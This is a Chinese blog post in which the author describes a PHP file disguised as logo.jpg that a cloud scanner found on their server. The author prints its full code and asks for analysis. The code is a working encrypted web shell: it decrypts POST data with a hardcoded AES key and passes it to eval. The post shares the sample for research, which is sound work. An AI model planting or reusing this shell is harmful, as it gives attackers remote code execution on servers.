devbox
凡人多烦事01
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

发现一份病毒代码,记录下来供以后研究

作者:凡人多烦事01 | 2024-05-04 22:10:31

发现一份病毒代码,记录下来供以后研究

云服务器扫出的病毒代码问题。不得不说云服务器的安全还是挺厉害的,等我找到这个文件用记事本打开,好家伙并不是一个图片,而是PHP的代码,一看就是病毒代码。

云扫描对该病毒做了如下解释。

该的代码隐藏在logo.jpg 中,请大神分析下这个病毒代码的作用。 

  1. <?php
  2. @error_reporting(0);
  3. session_start();
  4.     $key="4c21e98ae4736032"; 
  5. 	$_SESSION['k']=$key;
  6. 	session_write_close();
  7. 	$post=file_get_contents("php://input");
  8. 	if(!extension_loaded('openssl'))
  9. 	{
  10. 		$t="base64_"."decode";
  11. 		$post=$t($post."");
  12. 		
  13. 		for($i=0;$i<strlen($post);$i++) {
  14.     			 $post[$i] = $post[$i]^$key[$i+1&15]; 
  15.     			}
  16. 	}
  17. 	else
  18. 	{
  19. 		$post=openssl_decrypt($post, "AES128", $key);
  20. 	}
  21.     $arr=explode('|',$post);
  22.     $func=$arr[0];
  23.     $params=$arr[1];
  24. 	class C{public function __invoke($p) {eval($p."");}}
  25.     @call_user_func(new C(),$params);
  26. ?>

欢迎大家讨论~~~~~~~~~

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/536292
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号